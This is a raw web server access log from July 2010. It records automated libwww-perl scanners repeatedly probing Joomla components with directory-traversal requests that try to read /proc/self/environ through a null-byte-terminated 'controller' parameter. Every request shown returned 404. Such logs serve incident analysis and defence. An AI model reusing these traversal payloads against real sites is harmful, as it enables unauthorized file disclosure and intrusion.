91.121.67.226 - - [26/Jul/2010:10:35:21 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
99.198.108.74 - - [26/Jul/2010:10:35:22 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:35:29 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:36:08 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:36:08 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:36:15 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:36:32 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:36:32 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:36:51 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:36:52 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:37:31 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:37:59 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:37:59 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:38:00 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:38:02 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:38:02 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:38:02 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:39:53 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:39:53 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:39:54 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:44:03 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:44:03 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:44:03 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:44:14 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:44:14 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:44:14 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:44:58 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:44:58 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:44:58 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:10:46:32 +0200] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:10:46:33 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:10:48:01 +0200] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:10:48:01 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:50:54 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:50:54 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:50:54 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:51:18 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:51:18 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:51:19 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:54:38 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:54:38 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:54:38 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:54:50 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:54:50 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:55:40 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:55:41 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:10:55:43 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:55:43 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:55:45 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:55:45 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:55:47 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:55:51 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:55:52 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:55:52 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:55:53 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:10:55:54 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:56:10 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:10:57:52 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:57:52 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
99.198.108.74 - - [26/Jul/2010:10:57:53 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:57:53 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:57:53 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
83.169.23.182 - - [26/Jul/2010:10:57:55 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:57:55 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
78.41.233.128 - - [26/Jul/2010:10:57:58 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:57:58 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:57:58 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:10:58:07 +0200] "GET /logs//index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:58:07 +0200] "GET //index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
94.247.176.194 - - [26/Jul/2010:10:58:25 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:58:25 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:58:26 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:10:58:48 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:58:48 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:59:03 +0200] "GET /logs//index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:59:03 +0200] "GET //index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
99.198.108.74 - - [26/Jul/2010:10:59:06 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:59:06 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:59:07 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:59:16 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:59:16 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:59:16 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:10:59:34 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:59:38 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:59:40 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:11:00:24 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:00:24 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:00:25 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:00:31 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:00:45 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:00:46 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:00:46 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:11:01:15 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:01:16 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:01:16 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:14:45 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:14:45 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:14:45 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:11:14:47 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:14:47 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:14:47 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:14:49 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:14:49 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:14:49 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:11:21:29 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:21:29 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:21:29 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
74.55.73.74 - - [26/Jul/2010:11:23:36 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
